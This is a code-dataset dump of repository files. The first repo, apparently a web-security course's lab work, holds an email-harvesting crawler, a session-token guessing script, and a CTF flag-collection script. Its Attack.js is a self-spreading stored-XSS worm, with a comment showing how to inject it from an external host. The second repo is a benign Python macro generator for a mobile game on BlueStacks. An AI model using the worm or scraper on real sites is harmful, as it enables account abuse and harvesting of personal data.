DownloadImage(img2, i)\n i += 1\n\ndef MakeRequest(s, url, host):\n request = \"GET \" + url + \" HTTP/1.1\\n\"\n keep = \"Connection: Close\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\\n\"\n requestHost = \"Host: \" + host + \"\\r\\n\\r\\n\" \n fullResponse = ''\n s.send(request + keep + userAgent + requestHost)\n\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n \n return fullResponse\n\ndef MakeRequestSSL(s, url, host):\n request = \"GET \" + url + \" HTTP/1.1\\n\"\n requestHost = \"Host: \" + host + \"\\r\\n\\r\\n\" \n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\\n\"\n fullResponse = ''\n keep = 'Connection: close\\n'\n print \"########\"\n print request + keep + userAgent + requestHost\n print \"########\"\n s.send(request + keep + userAgent + requestHost)\n while True:\n response = s.recv(2048)\n if response == '':\n break \n fullResponse = fullResponse + response\n s.close()\n return fullResponse\n\ndef HandleRequest(url, host):\n link = ''\n #print host\n #print url\n if url.find(\"https://\") is not -1:\n try:\n s = Connect(host, 443)\n page = MakeRequestSSL(s, url, host)\n s.close()\n return page\n except ValueError:\n return ValueError\n else:\n s = Connect(host, 80)\n page = MakeRequest(s, url, host)\n #print len(page)\n \n #print \"---------------------------------------------------------------\"\n if len(page) < 700:\n headers, body = page.split(\"\\r\\n\\r\\n\")\n #print headers\n match = re.findall(r'HTTP/1\\.(?:0|1) 301[^\\r\\n]+', headers)\n if len(match) > 0:\n locationMatch = re.findall(r\"Location: ([^\\r\\n]+)\", headers)\n if len(locationMatch) > 0:\n link = locationMatch[0]\n host = link.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\", 1)[0]\n print host\n print link\n page = HandleRequest(link, host)\n else:\n raise ValueError(\"error finding location header\")\n\n s.close()\n return page\n\ndef FullWebCrawl(booler, csv):\n maxPages = 4\n findEmails = 1\n emails = set()\n urlQueue = []\n crawledUrls = []\n \n if booler:\n print 'Enter depth: '\n maxPages = int(input(\"$> \"))\n print 'Enter host. Example: \"www.rit.edu\"'\n host = str(input(\"$> \"))\n print 'Enter Url to crawl with trailing \"/\". 
Example: \"http://www.rit.edu/\"'\n url = str(input(\"$> \"))\n else:\n url = '/'\n host = csv\n\n urlQueue.append(url)\n while len(urlQueue) > 0 and maxPages > 0:\n url = urlQueue[0]\n page = HandleRequest(url, host)\n newEmails = set(re.findall(r\"[a-z0-9\\.\\-+_]+@[a-z0-9\\.\\-+_]+\\.[a-z]+\", page, re.I))\n print newEmails\n emails.update(newEmails)\n \n surl = urlQueue[0]\n crawledUrls.append(surl)\n urlQueue.pop(0)\n\n #print \"Now in: \" + surl\n #print \"-------------------------------------------------------------\"\n soup = BeautifulSoup(page)\n links = soup.findAll('a')\n\n for tag in links:\n link = tag.get('href', None)\n if link is not None and link not in crawledUrls and url in link:\n #print link\n urlQueue.append(link.encode('utf-8'))\n crawledUrls.append(link.encode('utf-8'))\n \n maxPages = maxPages - 1\n\n print emails\n return crawledUrls \n\ndef DirBuster(dirFile):\n host = \"52.23.205.104\"\n addPage = dirFile.split()\n print addPage\n\ndef main():\n directories = []\n #s = Connect('www.rit.edu', 80)\n s2 = Connect('www.rit.edu', 80)\n #ScrapeCsecWeb(s)\n ScrapeCsecImages(s2)\n #FullWebCrawl(True, None)\n\n '''df = pandas.read_csv('companies.csv', names=['name', 'url'])\n urls = df.url.tolist()\n for url in urls:\n try:\n url = url.replace(\"http://\", \"\")\n url = url.replace(\"https://\", \"\")\n url = url.replace(\"/market/pages/index.aspx\", \"\")\n url = url.replace(\"/pages/home.aspx\", \"\")\n url = url.replace(\"/\", \"\")\n directories.extend(FullWebCrawl(False, url))\n except socket.error as e:\n print e\n\n os.remove(\"directories.txt\")\n dirFile = open(\"directories.txt\", 'w')\n for item in directories:\n print>>dirFile, item'''\n #dirFile.close()\n #dirFile = open(\"directories.txt\", 'r')\n #DirBuster(dirFile)\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.48407644033432007,
"alphanum_fraction": 0.5668789744377136,
"avg_line_length": 19.933332443237305,
"blob_id": "5105cdd105936567e4f626869fedd2444c501a1f",
"content_id": "2200d073a4f6d2b904665b6f824e19bb088e1bcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 314,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 15,
"path": "/WebCrawler/PHP/token.php",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "<?php\n$base_url = \"http://52.90.2.57/armbook/?ARM_SESSION=\";\n$test_url = \"http://52.90.2.57/armbook/home.php\";\n$urls = array();\n$i = 0;\nwhile($i < 50){\n $new_session = substr(md5(time()), 0, 22);\n $value = $base_url.$new_session;\n $response = $value;\n echo \"\\n\";\n echo $response;\n sleep(1);\n $i++;\n}\n?>\n"
},
{
"alpha_fraction": 0.5740597248077393,
"alphanum_fraction": 0.6079553961753845,
"avg_line_length": 28.76036834716797,
"blob_id": "7a8ba9f7d4db87dbcfb71b9ae966ab8e984de88b",
"content_id": "47a8734d29f2a23bfb25490be61a5e9b3cf1e67b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6461,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 217,
"path": "/BasicHTTP/HttpConnect.py",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport socket\nimport urllib\n\ndef Connect(host, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n return s\n\ndef SendDataA1(s, request, requestHost):\n con = \"Connection: keep-alive\\n\\n\"\n s.send(request + requestHost + con)\n\ndef SendDataA2(s, request, requestHost, token):\n tokenParam = \"token=\" + token + \"\\n\\n\" \n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n contentLen = \"Content-Length: {}\\n\\n\".format(len(tokenParam)-2)\n s.send(request + requestHost + contentType + contentLen + tokenParam)\n return s\n\ndef SendDataA3(s, token, solution):\n tokenParam = \"&token=\" + token + \"\\n\\n\"\n captchaParam = \"solution=\" + str(solution)\n content = captchaParam + tokenParam\n\n #connection = \"Connection: keep-alive\\n\"\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n request = \"POST /getFlag3Challenge HTTP/1.1\\n\"\n requestHost = \"Host: 54.209.150.110\\n\"\n\n s.send(request + requestHost + contentType + contentLen + content) \n\n#16^56 < 256^16 < 256^32 = total char combinations somewhere between AES128 and AES256\ndef RecieveAndPrintA1(s):\n full = \"\"\n token = \"\"\n\n while True:\n response = s.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n token = full[len(full)-1]\n token = token[:-1]\n return token\n\ndef RecieveAndPrintA2(s2, token):\n full = \"\"\n full2 = \"\"\n toke = \"\"\n\n while True:\n response = s2.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n captcha = full[len(full)-1]\n solution = PerformOperation(captcha)\n print solution\n\n s2.close()\n s = Connect('54.209.150.110', 80)\n SendDataA3(s, token, solution) \n while True:\n response2 = s.recv(1024)\n print response2\n if response2 == '':\n break\n else:\n full2 = response2\n full2 = full2.split()\n toke = full2[len(full2)-1]\n toke = toke[:-1]\n return toke \n\ndef CreateAccount(s, token, request, requestHost):\n tokenParam = \"token=\" + token + \"\\n\\n\"\n content = \"username=hostmaster&\" + tokenParam\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\\n\"\n accept = \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\n\"\n acceptLan = \"Accept-Language: en-US,en;q=0.5\\n\"\n acceptEnc = \"Accept-Encoding: gzip, deflate\\n\"\n print request + userAgent + requestHost + contentType + contentLen + content\n s.send(request + userAgent + requestHost + accept + acceptLan + acceptEnc + contentType + contentLen + content)\n\ndef TestLogin(s, token, request, requestHost, password):\n content = \"token=\" + token + \"&username=hostmaster\" + \"&password=\" + urllib.quote_plus(password) + \"\\n\\n\"\n contentLen =\"Content-Length: {}\\n\\n\".format(len(content)-2)\n contentType = \"Content-Type: application/x-www-form-urlencoded\\n\"\n userAgent = \"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\\n\"\n accept = \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\n\"\n acceptLan = \"Accept-Language: en-US,en;q=0.5\\n\"\n acceptEnc = \"Accept-Encoding: gzip, deflate\\n\"\n\n\n print request + userAgent + requestHost + accept + 
acceptLan + acceptEnc + contentType + contentLen + content\n s.send(request + userAgent + requestHost + accept + acceptLan + acceptEnc + contentType + contentLen + content)\n\ndef PerformOperation(captcha):\n operator = ''\n operend1 = ''\n operend2 = ''\n captcha = list(captcha)\n\n for char in captcha:\n if char == '+':\n operator = '+'\n elif char == '-':\n operator = '-'\n elif char == '*':\n operator = '*'\n elif char == '/':\n operator = '/'\n elif char == '\"':\n print ''\n elif operator == '':\n operend1 = operend1 + char\n elif operator != '':\n operend2 = operend2 + char\n else:\n print \"You broke something. Fix it.\"\n\n if operator == '+':\n captcha = int(operend1) + int(operend2)\n elif operator == '-':\n captcha = int(operend1) - int(operend2)\n elif operator == '*':\n captcha = int(operend1) * int(operend2)\n elif operator == '/':\n captcha = int(operend1) / int(operend2)\n else:\n print \"You broke something. Fix it.\"\n \n return captcha\n\ndef BasicConnect():\n host = '54.209.150.110'\n port = 80\n request = \"POST / HTTP/1.1\\n\"\n requestHost = \"Host: 54.209.150.110\\n\\n\"\n\n s = Connect(host, port)\n s.send(request + requestHost)\n flag0 = RecieveAndPrintA1(s)\n print flag0\n s.close()\n\ndef RecieveAndPrintPass(s):\n full = \"\"\n token = \"\"\n\n while True:\n response = s.recv(1024)\n print response\n if response == '':\n break\n else:\n full = response\n \n full = full.split()\n token = full[len(full)-1]\n token = token[:]\n return token\n\n#------------------------------------------------------------------------------#\nhost = '54.209.150.110'\nport = 80\nrequest = \"POST /getSecure HTTP/1.1\\n\"\nrequestHost = \"Host: 54.209.150.110\\n\"\n\nBasicConnect()\nprint \"$----------> Start token and flag collection.\"\n\ns = Connect(host, port)\nSendDataA1(s, request, requestHost)\ntoken = RecieveAndPrintA1(s)\nprint token\ns.close()\n\nrequest = \"POST /getFlag2 HTTP/1.1\\n\"\ns = Connect(host, port)\nSendDataA2(s, request, requestHost, token)\nflag1 = RecieveAndPrintA1(s)\nprint flag1\ns.close()\n\nrequest = \"POST /getFlag3Challenge HTTP/1.1\\n\"\ns = Connect(host, port)\ns2 = SendDataA2(s, request, requestHost, token)\nflag2 = RecieveAndPrintA2(s2, token)\nprint flag2\ns2.close()\n\nrequest = \"POST /createAccount HTTP/1.1\\n\"\ns = Connect(host, port)\nCreateAccount(s, token, request, requestHost)\npassword = RecieveAndPrintPass(s)\ns.close()\nprint password\n\nrequest = \"POST /login HTTP/1.1\\n\"\ns = Connect(host, port)\nTestLogin(s, token, request, requestHost, password)\nsuccess = RecieveAndPrintA1(s)\ns.close()\nprint success\n\n\n\n"
},
{
"alpha_fraction": 0.6122807264328003,
"alphanum_fraction": 0.6350877285003662,
"avg_line_length": 39.71428680419922,
"blob_id": "11eb848fe1be6ea038ad2fa4a89bf496c47cf4c5",
"content_id": "392ee9578125d7d3c8e9c738f27cd7f74f4e3126",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 570,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 14,
"path": "/Attack.js",
"repo_name": "JonLMyers/WebSecurity",
"src_encoding": "UTF-8",
"text": "$( document ).ready(function(){\n\n $.get(\"add_friend.php?id=114\");\n $.ajax({url:\"add_comment.php?id=114&comment=\"+ new Date()});\n $.get(\"home.php\", function(data, status){\n var ln = data.search(\"id=\");\n var ids = data.substr(ln, 6);\n var id = ids.match(/\\d+/)[0];\n\t\t\t$.ajax({url:\"add_comment.php?id=\"+id+\"&comment=\"+encodeURI(document.getElementById(\"m\").outerHTML)});\n\t});\n});\n\n//<script type=\"text/javascript\" src=\"https://rawgit.com/JonLMyers/WebSecurity/master/Attack.js\"></script>\n//https://drive.google.com/host/0B_BwSrIRFmFza01yWEV3aWQ2eHM\n"
}
] | 6 |
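The exploit script in this repo hand-builds HTTP/1.1 requests over a raw socket using bare "\n" line endings, which many servers tolerate but RFC 7230 formally requires CRLF ("\r\n") plus a Content-Length that matches the body exactly. A minimal sketch of the same pattern with strict framing (host, path, and body here are placeholders, not taken from the challenge above):

```python
import socket

def post(host, path, body, port=80):
    # Build a spec-compliant HTTP/1.1 POST: CRLF line endings and an
    # exact Content-Length, so no trailing "\n\n" fudging is needed.
    request = (
        "POST {} HTTP/1.1\r\n"
        "Host: {}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: {}\r\n"
        "Connection: close\r\n\r\n"
    ).format(path, host, len(body)) + body
    s = socket.create_connection((host, port))
    s.sendall(request.encode())
    chunks = []
    while True:
        data = s.recv(4096)
        if not data:
            break
        chunks.append(data)
    s.close()
    return b"".join(chunks)
```

With `Connection: close`, the read loop above can safely drain until EOF instead of guessing when the response ends.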
tobyatgithub/GxB_BlueStack_automation
|
https://github.com/tobyatgithub/GxB_BlueStack_automation
|
4d8338e0ac87b40be8abeed050535151e7142265
|
64ecb8f2bcf8a284fe2d5904fd8122fa8bf05d26
|
746f93504c48d8930a2bd1ddcb0fb80ef0336dbc
|
refs/heads/main
| 2023-07-15T09:11:23.568816 | 2021-08-24T07:55:24 | 2021-08-24T07:55:24 | 398,653,989 | 0 | 0 |
MIT
| 2021-08-21T20:52:01 | 2021-08-21T21:10:37 | 2021-08-24T07:55:24 |
Python
|
[
{
"alpha_fraction": 0.7531017661094666,
"alphanum_fraction": 0.7636476159095764,
"avg_line_length": 31.239999771118164,
"blob_id": "503bb2122b1b8877e1911e8171f5cbd04f4d88b1",
"content_id": "ef5048cf54cc5e94c1c0162068db92afd537e0d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1612,
"license_type": "permissive",
"max_line_length": 162,
"num_lines": 50,
"path": "/README.md",
"repo_name": "tobyatgithub/GxB_BlueStack_automation",
"src_encoding": "UTF-8",
"text": "# GxB_BlueStack_automation\n\nUsing python to generate json marco script for Blue Stack to execute for game GxB2\n\n## Goal\n\nCreate a stable method to create and maintain auto marco of BlueStack5 for GxB game. (This method can be shared by any other apps running on BlueStack simulator.)\n\n## Update Logs\n\n-v1.0 can performing basic functions as campaign collect, excursion collect, dorm collect, etc.\n-v1.1 taking refactor suggestion from kekw#0204\n\n## Challenges\n\n- (maintainance need) The game UI gets updated frequently\n- (easy-to-regenerate) Mannual record has to be perfect in one run, you also need to make sure it covers different situations and responses\n- (scale-up need) New functionalities frequently added\n\n## Install\n\nNo specific package install required. All library used in this code is python standard.\n\n## Usage\n\nYou can use the `DailyTask_v3.json` directly (by importing it into your marco manager.)\n\nOR:\n\n1. Clone this repo (make sure you have `git` in your terminal)\n\n```bash\ngit clone https://github.com/tobyatgithub/GxB_BlueStack_automation.git\ncd GxB_BlueStack_automation\n```\n\n2. Generate the json marco script\n\n```bash\npython jsonGenerator.py\n```\n\n3. The default result will be called `data.json` in the same folder. You can import this script directly as a marco in BlueStacks:\n -> open marco manager -> import -> select this json file\n\n## Parameters\n\nRight now the script is set to run every 4 hours (the whole script shall take about 4-5 mins). \nEach time, it will open the game, do all the collects, and close the game. \nTODO: more about the detailed parameters and how to change it.\n"
},
{
"alpha_fraction": 0.5725909471511841,
"alphanum_fraction": 0.6069464087486267,
"avg_line_length": 32.09975051879883,
"blob_id": "5274cff1a48467503a9e277dcd3e0a7e085e7bc9",
"content_id": "967a04a4c05b3a23c7d32ca2bab50b91d39cdc65",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13273,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 401,
"path": "/jsonGenerator.py",
"repo_name": "tobyatgithub/GxB_BlueStack_automation",
"src_encoding": "UTF-8",
"text": "\"\"\"\njsonGenerator.py\nauthor: Toby\ndate: Aug. 21 2021\n\nHere is a systematic way to generate BlueStack marco for GxB2.\n\nTODO:\n- auto excursion explore [DONE]\n- pet training [DONE]\n- pet fighting\n\"\"\"\n\nimport json\nfrom datetime import datetime\n\nRESOLUTION_X = 900\nRESOLUTION_Y = 1600\nFOUR_HOURS = 14400 # in second\nSECOND = 1000\nMINUTE = SECOND * 60\n\n# Locations\nCLEARALL = (83, 5)\nGAME_ENTRANCE = (444, 366)\nHOMEPAGE_TAB = (54, 1558)\nCAPSULE_TAB = (522, 1522)\nGUILD_TAB = (666, 1525)\nALCHEMY_BUTTON = (420, 48.5)\nCAMPAIGN_BUTTON = (444, 1285)\nEXCURSION_BUTTON = (840, 673)\nQUIZ_BUTTON = (844, 430)\nRETURN_AND_MAILBOX_BUTTON = (838, 55)\nFRIENDS_BUTTON = (828, 170)\nSERVANT_BUTTON = (841, 545)\n\n\nclass Solution:\n def __init__(self, START_TIME=1000, DEBUG=False):\n self.data = {}\n self.moving_timestamp = START_TIME\n self.DEFAULT_WAIT = 2 * SECOND # ms\n self.LONGER_WAIT = 4 * SECOND # ms\n self.DEBUG = DEBUG\n\n # the basic blocks\n def saveJson(self, filename=\"data.json\"):\n \"\"\"\n Save the json dictionary to file.\n \"\"\"\n text_content = json.dumps(self.data, indent=4, sort_keys=False)\n if self.DEBUG:\n print(text_content)\n with open(filename, \"w\") as outfile:\n outfile.write(text_content)\n\n def createHeader(self):\n \"\"\"\n Create header for the json file.\n \"\"\"\n self.data[\"Acceleration\"] = 1\n self.data[\"CreationTime\"] = datetime.now().strftime(\"%Y%m%dT%H%M%S\")\n self.data[\"DoNotShowWindowOnFinish\"] = False\n self.data[\"Events\"] = []\n\n def createFooter(\n self,\n LoopInterval=FOUR_HOURS,\n LoopType=\"UntilStopped\",\n RestartPlayerAfterMinutes=60,\n ):\n \"\"\"\n Create footer for the json file.\n \"\"\"\n self.data[\"LoopDuration\"] = 0\n self.data[\"LoopInterval\"] = LoopInterval\n self.data[\"LoopIterations\"] = 1\n self.data[\"LoopType\"] = LoopType\n self.data[\"MacroSchemaVersion\"] = 2\n self.data[\"RestartPlayer\"] = False\n self.data[\"RestartPlayerAfterMinutes\"] = RestartPlayerAfterMinutes\n\n # def addEvent(self, start_timestamp, X, Y, span=100):\n def addEvent(self, start_timestamp, coordinateXY, span=100):\n \"\"\"\n General type for adding an event, which will be\n one mouse down and one mouse up by default.\n start_timestamp: the starting time stamp for this event, in int\n coordinateXY: a tuple (int, int) for (X, Y) location\n span: time between mouse down and mouse up in ms\n \"\"\"\n X, Y = coordinateXY\n if X > 100 or Y > 100:\n local_X = 100 * X / RESOLUTION_X # change to 0-100 %\n local_Y = 100 * Y / RESOLUTION_Y\n else:\n local_X = X\n local_Y = Y\n\n mouseDown = {\n \"Delta\": 0,\n \"EventType\": \"MouseDown\",\n \"Timestamp\": start_timestamp,\n \"X\": local_X,\n \"Y\": local_Y,\n }\n mouseUp = {\n \"Delta\": 0,\n \"EventType\": \"MouseUp\",\n \"Timestamp\": start_timestamp + span,\n \"X\": local_X,\n \"Y\": local_Y,\n }\n self.data[\"Events\"].append(mouseDown)\n self.data[\"Events\"].append(mouseUp)\n\n def returnHomepage(self):\n for _ in range(2):\n self.addEvent(self.moving_timestamp, HOMEPAGE_TAB)\n self.moving_timestamp += 2 * SECOND\n\n # the specific function blocks\n def openGame(self, timestamp=1400):\n self.moving_timestamp += timestamp\n self.addEvent(self.moving_timestamp, GAME_ENTRANCE)\n # wait for 30 seconds in case of update\n self.moving_timestamp += 30 * SECOND\n\n def closeAll(self):\n task = {\"EventType\": \"UiRecentApps\", \"Timestamp\": self.moving_timestamp}\n self.data[\"Events\"].append(task)\n self.moving_timestamp += 5 * SECOND\n 
self.addEvent(self.moving_timestamp, CLEARALL)\n\n def getCampaignRewards(self):\n \"\"\"\n Get campaign rewards.\n A closed loop from home to home.\n \"\"\"\n self.returnHomepage()\n\n # enter campaign\n self.addEvent(self.moving_timestamp, CAMPAIGN_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit collect 5 times\n for _ in range(5):\n self.addEvent(self.moving_timestamp, (822, 880))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # open the item box\n self.addEvent(self.moving_timestamp, (814, 1365))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit claim\n self.addEvent(self.moving_timestamp, (457, 1091))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go back to the front page\n self.returnHomepage()\n\n def getDormRewards(self):\n self.returnHomepage()\n\n # go to campus\n self.addEvent(self.moving_timestamp, (113, 1297))\n self.moving_timestamp += self.LONGER_WAIT\n\n # go life tab\n self.addEvent(self.moving_timestamp, (660, 149))\n self.moving_timestamp += self.LONGER_WAIT\n\n # select Dorm\n self.addEvent(self.moving_timestamp, (668, 437))\n self.moving_timestamp += self.LONGER_WAIT\n\n # clicl claim\n self.addEvent(self.moving_timestamp, (142, 226))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit collect\n self.addEvent(self.moving_timestamp, (471, 973))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit return\n self.addEvent(self.moving_timestamp, (838, 55))\n self.moving_timestamp += self.LONGER_WAIT\n\n # go back to home page\n self.returnHomepage()\n\n def getExcursionRewards(self):\n self.returnHomepage()\n\n # go to excursion\n self.addEvent(self.moving_timestamp, EXCURSION_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit claim all\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (144, 1450))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # hit auto explore\n self.addEvent(self.moving_timestamp, (702, 1336))\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (450, 1238))\n self.moving_timestamp += 10 * SECOND\n\n # hit return *\n for _ in range(4):\n self.addEvent(self.moving_timestamp, (838, 55))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # re-init\n self.returnHomepage()\n\n def getFreeRegularCapus(self):\n self.returnHomepage()\n\n # go to capsule\n self.addEvent(self.moving_timestamp, CAPSULE_TAB)\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # hit regular pull\n self.addEvent(self.moving_timestamp, (536, 398))\n self.moving_timestamp += self.LONGER_WAIT\n\n # hit OK\n self.addEvent(self.moving_timestamp, (181, 1025))\n self.moving_timestamp += self.LONGER_WAIT\n\n self.returnHomepage()\n\n def doOneJuniorLeagueBattle(self):\n self.returnHomepage()\n\n # go to League\n self.addEvent(self.moving_timestamp, (800, 1300))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go to League tab\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (666, 152))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # go to Junior section\n self.addEvent(self.moving_timestamp, (455, 350))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.addEvent(self.moving_timestamp, (463, 1326)) # hit fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (747, 952)) # pick the 3rd opponent\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (455, 924)) # confirm fight\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (817, 719)) # select reward\n self.moving_timestamp += 
self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (444, 1109)) # return *\n self.moving_timestamp += self.DEFAULT_WAIT\n self.returnHomepage()\n\n def getQuizRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, QUIZ_BUTTON) # open quiz\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1365)) # claim all\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1189)) # OK *\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 1159)) # OK *\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getAlchemyRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, ALCHEMY_BUTTON) # hit alchemy +\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (275, 953)) # hit free\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getAllMailRewards(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, RETURN_AND_MAILBOX_BUTTON) # hit mail box\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (442, 1266)) # claim all\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def takeServantClass(self):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, SERVANT_BUTTON)\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (450, 887))\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(3):\n self.addEvent(self.moving_timestamp, (810, 223))\n self.moving_timestamp += self.DEFAULT_WAIT\n for _ in range(3):\n self.addEvent(self.moving_timestamp, (512, 927))\n self.moving_timestamp += self.LONGER_WAIT\n self.returnHomepage()\n\n def getFriendsRewards(self, doCoop=True):\n self.returnHomepage()\n\n self.addEvent(self.moving_timestamp, FRIENDS_BUTTON) # open friends\n self.moving_timestamp += self.LONGER_WAIT\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (730, 544)) # cliam and send\n self.moving_timestamp += self.DEFAULT_WAIT\n\n if doCoop:\n self.addEvent(self.moving_timestamp, (744, 442)) # go coop\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (454, 1169)) # fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (457, 923)) # confirm fight\n self.moving_timestamp += self.LONGER_WAIT\n self.addEvent(self.moving_timestamp, (450, 1500)) # OK\n self.moving_timestamp += self.LONGER_WAIT\n\n self.returnHomepage()\n\n def getGuildRewards(self):\n self.returnHomepage()\n\n # sign-in\n self.addEvent(self.moving_timestamp, GUILD_TAB)\n self.moving_timestamp += self.LONGER_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (457, 380))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (711, 772))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n # return to guild page and do caffee\n for _ in range(3):\n self.addEvent(self.moving_timestamp, GUILD_TAB)\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(4):\n self.addEvent(self.moving_timestamp, (758, 443))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n for _ in range(2):\n self.addEvent(self.moving_timestamp, (454, 1180))\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.addEvent(self.moving_timestamp, (184, 856)) # task 1\n self.moving_timestamp += self.DEFAULT_WAIT\n 
self.addEvent(self.moving_timestamp, (455, 856)) # task 2\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (716, 856)) # task 3\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (184, 1276)) # task 4\n self.moving_timestamp += self.DEFAULT_WAIT\n self.addEvent(self.moving_timestamp, (455, 1276)) # task 5\n self.moving_timestamp += self.DEFAULT_WAIT\n\n self.returnHomepage()\n\n\ndef main():\n app = Solution()\n app.createHeader()\n\n # start the app\n app.openGame()\n app.getCampaignRewards()\n app.getDormRewards()\n app.getExcursionRewards()\n app.doOneJuniorLeagueBattle()\n app.getFreeRegularCapus()\n app.getGuildRewards()\n app.getQuizRewards()\n app.getAlchemyRewards()\n app.getAllMailRewards()\n app.takeServantClass()\n app.getFriendsRewards()\n app.closeAll()\n app.createFooter(\n LoopInterval=(FOUR_HOURS - app.moving_timestamp // SECOND)\n ) # time calculated in seconds\n app.saveJson()\n\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 2 |
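For reference, each tap that jsonGenerator.py emits becomes a MouseDown/MouseUp pair with pixel coordinates converted to percentages of the 900x1600 screen. A rough sketch of one generated event pair (values computed from the HOMEPAGE_TAB location in the script; the schema fields come from that script, not from any BlueStacks documentation):

```python
# Tap at pixel (54, 1558) on a 900x1600 screen, expressed as 0-100 %.
x_pct = 100 * 54 / 900      # 6.0
y_pct = 100 * 1558 / 1600   # 97.375

# Default span is 100 ms between press and release, START_TIME is 1000.
events = [
    {"Delta": 0, "EventType": "MouseDown", "Timestamp": 1000, "X": x_pct, "Y": y_pct},
    {"Delta": 0, "EventType": "MouseUp",   "Timestamp": 1100, "X": x_pct, "Y": y_pct},
]
```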
gurusarishkumar-it19/myprograms
|
https://github.com/gurusarishkumar-it19/myprograms
|
5e9d1f557929bae361bc13efa2c44a269827b61b
|
dd33c41001644d91fdc3c6fc81c6028ab75b8cee
|
caa1f6a621875883098c380550fe9c669585fe44
|
refs/heads/master
